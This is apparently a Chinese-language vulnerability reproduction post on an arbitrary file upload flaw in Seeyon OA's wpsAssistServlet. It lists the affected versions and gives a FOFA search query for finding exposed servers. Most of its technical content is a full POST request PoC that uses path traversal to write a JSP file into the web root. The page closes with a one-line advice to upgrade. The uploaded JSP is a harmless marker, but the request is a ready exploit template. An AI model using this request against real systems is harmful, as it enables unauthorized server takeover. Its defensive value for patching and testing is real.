致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]

文章目录

  • [致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]](#致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC])
    • [0x01 前言](#0x01 前言)
    • [0x02 漏洞描述](#0x02 漏洞描述)
    • [0x03 影响版本](#0x03 影响版本)
    • [0x04 漏洞环境](#0x04 漏洞环境)
    • [0x05 漏洞复现](#0x05 漏洞复现)
    • [0x06 修复建议](#0x06 修复建议)

致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

致远互联oa办公自动化软件系统,实现企业审批/报销/门户/公文/文档/采购/费用等综合管理,致远互联oa办公自动化软件系统,满足企业一体化办公需求。

致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。

0x03 影响版本

复制代码
致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)

0x04 漏洞环境

FOFA语法:app="致远互联-OA" && title="V8.0SP2"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC (POST)

bash 复制代码
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/seeyonlog.jsp&fileId=2 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 217
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71

--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("12345678");%>  
--a4d7586ac9d50625dee11e86fa69bc71--

3.复现

拼接上传的文件路径:https://127.0.0.1/seeyonlog.jsp

0x06 修复建议

致远OA已发布安全更新,建议升级至最新版本。

相关推荐
橙子家2 小时前
AI Coding 中的概念 Vibe Coding 和 Spec Coding 简介
其他
橙子家18 小时前
专业术语简介【二】:数据库排水、哈希碰撞、彩虹表漏洞、多因子认证、流状态(Flow State)
其他
漏洞谷19 小时前
白帽子为什么几乎都绕不开 httpx:一款 HTTP 资产探测工具的技术价值
web安全·漏洞挖掘·安全工具
用户962377954484 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主5 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954487 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954487 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star7 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全